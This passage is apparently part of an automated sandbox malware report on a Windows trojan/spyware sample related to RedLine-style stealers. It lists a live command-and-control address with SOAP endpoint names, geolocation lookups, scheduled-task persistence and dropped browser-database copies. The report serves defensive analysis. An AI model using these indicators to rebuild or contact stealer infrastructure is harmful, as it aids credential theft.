https://ipinfo.io/ip%appdata%	nzLoHpgAln.exe, nzLoHpgAln.exe, 00000008.00000002.1856986436.0000000000402000.00000040.00000400.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000A.00000002.1851476020.0000000004435000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000A.00000002.1851476020.0000000003C31000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.222.57.76:55615	nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002E84000.00000004.00000800.00020000.00000000.sdmp, nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003311000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	tmp7E24.tmp.14.dr, tmpE739.tmp.8.dr, tmp214E.tmp.8.dr, tmp212A.tmp.8.dr, tmpE729.tmp.8.dr, tmp7E97.tmp.14.dr, tmp7E86.tmp.14.dr, tmp214D.tmp.8.dr, tmp44D3.tmp.14.dr, tmp212B.tmp.8.dr, tmpB76A.tmp.14.dr, tmp44C3.tmp.14.dr, tmp44A1.tmp.14.dr, tmp213C.tmp.8.dr, tmp211A.tmp.8.dr, tmpE74A.tmp.8.dr, tmp7E75.tmp.14.dr, tmp44B2.tmp.14.dr, tmp2109.tmp.8.dr, tmp215E.tmp.8.dr, tmpE74B.tmp.8.dr	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/CheckConnectResponse	nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.datacontract.org/2004/07/	nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002E84000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003311000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.222.57.76:5	nzLoHpgAln.exe, 00000008.00000002.1859385903.000000000305C000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003533000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	nzLoHpgAln.exe, nzLoHpgAln.exe, 00000008.00000002.1856986436.0000000000402000.00000040.00000400.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000A.00000002.1851476020.0000000004435000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000A.00000002.1851476020.0000000003C31000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.222.57.76:55615t-	nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002E84000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003311000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.ip.sb	nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.00000000032D0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	tmp7E24.tmp.14.dr, tmpE739.tmp.8.dr, tmp214E.tmp.8.dr, tmp212A.tmp.8.dr, tmpE729.tmp.8.dr, tmp7E97.tmp.14.dr, tmp7E86.tmp.14.dr, tmp214D.tmp.8.dr, tmp44D3.tmp.14.dr, tmp212B.tmp.8.dr, tmpB76A.tmp.14.dr, tmp44C3.tmp.14.dr, tmp44A1.tmp.14.dr, tmp213C.tmp.8.dr, tmp211A.tmp.8.dr, tmpE74A.tmp.8.dr, tmp7E75.tmp.14.dr, tmp44B2.tmp.14.dr, tmp2109.tmp.8.dr, tmp215E.tmp.8.dr, tmpE74B.tmp.8.dr	false		high
http://tempuri.org/Endpoint/CheckConnect	nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	tmp7E24.tmp.14.dr, tmpE739.tmp.8.dr, tmp214E.tmp.8.dr, tmp212A.tmp.8.dr, tmpE729.tmp.8.dr, tmp7E97.tmp.14.dr, tmp7E86.tmp.14.dr, tmp214D.tmp.8.dr, tmp44D3.tmp.14.dr, tmp212B.tmp.8.dr, tmpB76A.tmp.14.dr, tmp44C3.tmp.14.dr, tmp44A1.tmp.14.dr, tmp213C.tmp.8.dr, tmp211A.tmp.8.dr, tmpE74A.tmp.8.dr, tmp7E75.tmp.14.dr, tmp44B2.tmp.14.dr, tmp2109.tmp.8.dr, tmp215E.tmp.8.dr, tmpE74B.tmp.8.dr	false		high
http://tempuri.org/Endpoint/SetEnviron	nzLoHpgAln.exe, 00000008.00000002.1859385903.000000000305C000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003533000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.carterandcone.coml	nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	tmp7E24.tmp.14.dr, tmpE739.tmp.8.dr, tmp214E.tmp.8.dr, tmp212A.tmp.8.dr, tmpE729.tmp.8.dr, tmp7E97.tmp.14.dr, tmp7E86.tmp.14.dr, tmp214D.tmp.8.dr, tmp44D3.tmp.14.dr, tmp212B.tmp.8.dr, tmpB76A.tmp.14.dr, tmp44C3.tmp.14.dr, tmp44A1.tmp.14.dr, tmp213C.tmp.8.dr, tmp211A.tmp.8.dr, tmpE74A.tmp.8.dr, tmp7E75.tmp.14.dr, tmp44B2.tmp.14.dr, tmp2109.tmp.8.dr, tmp215E.tmp.8.dr, tmpE74B.tmp.8.dr	false		high
http://www.fontbureau.com/designers/cabarga.htmlN	nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn	nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/frere-user.html	nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing	nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/GetUpdatesResponse	nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/	nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers8	nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	tmp7E24.tmp.14.dr, tmpE739.tmp.8.dr, tmp214E.tmp.8.dr, tmp212A.tmp.8.dr, tmpE729.tmp.8.dr, tmp7E97.tmp.14.dr, tmp7E86.tmp.14.dr, tmp214D.tmp.8.dr, tmp44D3.tmp.14.dr, tmp212B.tmp.8.dr, tmpB76A.tmp.14.dr, tmp44C3.tmp.14.dr, tmp44A1.tmp.14.dr, tmp213C.tmp.8.dr, tmp211A.tmp.8.dr, tmpE74A.tmp.8.dr, tmp7E75.tmp.14.dr, tmp44B2.tmp.14.dr, tmp2109.tmp.8.dr, tmp215E.tmp.8.dr, tmpE74B.tmp.8.dr	false		high
http://schemas.xmlsoap.org/soap/actor/next	nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.222.57.76	unknown	Netherlands		51447	ROOTLAYERNETNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583001
Start date and time:	2025-01-01 12:31:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 16s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	nzLoHpgAln.exe renamed because original name is a hash value
Original Sample Name:	9f417a8434a3ea2932b0a23ebae7e7fa.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@21/103@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 125 Number of non-executed functions: 23
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 104.26.13.31, 172.67.75.172, 104.26.12.31, 184.28.90.27, 172.202.163.200, 13.107.246.45
Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, d.3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.8.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
06:31:56	API Interceptor	38x Sleep call for process: nzLoHpgAln.exe modified
06:32:03	API Interceptor	38x Sleep call for process: powershell.exe modified
06:32:06	API Interceptor	43x Sleep call for process: wZWwzQVEakJvEU.exe modified
11:32:03	Task Scheduler	Run new task: wZWwzQVEakJvEU path: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ROOTLAYERNETNL	ljMiHZ8MwZ.exe	Get hash	malicious	RedLine	Browse	45.137.22.250
	aYf5ibGObB.exe	Get hash	malicious	RedLine	Browse	185.222.58.90
	K3xL5Xy0XS.exe	Get hash	malicious	RedLine	Browse	185.222.58.90
	Invoice-BL. Payment TT $ 16945.99.exe	Get hash	malicious	RedLine	Browse	45.137.22.164
	MfzXU6tKOq.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	185.222.58.82
	lWnSA7IyVc.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	185.222.58.229
	8ZVd2S51fr.exe	Get hash	malicious	RedLine	Browse	185.222.58.241
	Purchase Order Purchase Order Purchase Order Purchase Order.exe	Get hash	malicious	FormBook, GuLoader	Browse	185.222.57.90
	Purchase Order Purchase Order Purchase Order Purchase Order.exe	Get hash	malicious	FormBook, GuLoader	Browse	185.222.57.90
	9dOKGgFNL2.exe	Get hash	malicious	RedLine	Browse	45.137.22.126

Process:	C:\Users\user\Desktop\nzLoHpgAln.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:ML9E4KiE4Kx1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MxHKiHKx1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	8B21C0FDF91680677FEFC8890882FD1F
SHA1:	E15AC7685BFC89F63015C29DE7F6BCE7A1A9F0E7
SHA-256:	E2F188397C73C8150EE6F09E833E4D1ABA01293CCFDFED61981F5F66660731F9
SHA-512:	1EFDF56115A8688CA2380F3047A28CA3E03C74369C3A377050066A56B8171AD756F7DD7AA29F5648A84D16812D1B422749259ED47447713E9B3A0834CE361BE7
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\wZWwzQVEakJvEU.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:ML9E4KiE4Kx1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MxHKiHKx1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	8B21C0FDF91680677FEFC8890882FD1F
SHA1:	E15AC7685BFC89F63015C29DE7F6BCE7A1A9F0E7
SHA-256:	E2F188397C73C8150EE6F09E833E4D1ABA01293CCFDFED61981F5F66660731F9
SHA-512:	1EFDF56115A8688CA2380F3047A28CA3E03C74369C3A377050066A56B8171AD756F7DD7AA29F5648A84D16812D1B422749259ED47447713E9B3A0834CE361BE7
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	2232
Entropy (8bit):	5.379540626579189
Encrypted:	false
SSDEEP:	48:BWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//YPUyus:BLHyIFKL3IZ2KRH9OugQs
MD5:	AE1EFD7CB60CC01189449CF39ADC8E79
SHA1:	7E5A0B7A03C2F791815C0FEFDB0EB8352CF2DA4E
SHA-256:	26BEF97E0FBCF0C58D948549D4DB5BA31D51B6FB09002294BF497B936D68FE69
SHA-512:	2840812F1C7D32C26A28EE26AE3FB970682688B3445AC9BC6819C82D178C25C224DACB6ADD4168690FF9D3B5EFD66D67919A6B8FEE0B8F157A7EB8AB3334EAD6
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_14bvgc3h.be3.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g5x2tccv.10n.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ijnwrple.mpo.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ka30tgcr.lyn.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nrljpeyj.aiy.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xkbw5r5b.aav.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zcazmfrm.d3r.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zmnsgog5.vw0.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp2109.tmp

Download File

Process:	C:\Users\user\Desktop\nzLoHpgAln.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp211A.tmp

Download File

Process:	C:\Users\user\Desktop\nzLoHpgAln.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp212A.tmp

Download File

Process:	C:\Users\user\Desktop\nzLoHpgAln.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp212B.tmp

Download File

Process:	C:\Users\user\Desktop\nzLoHpgAln.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
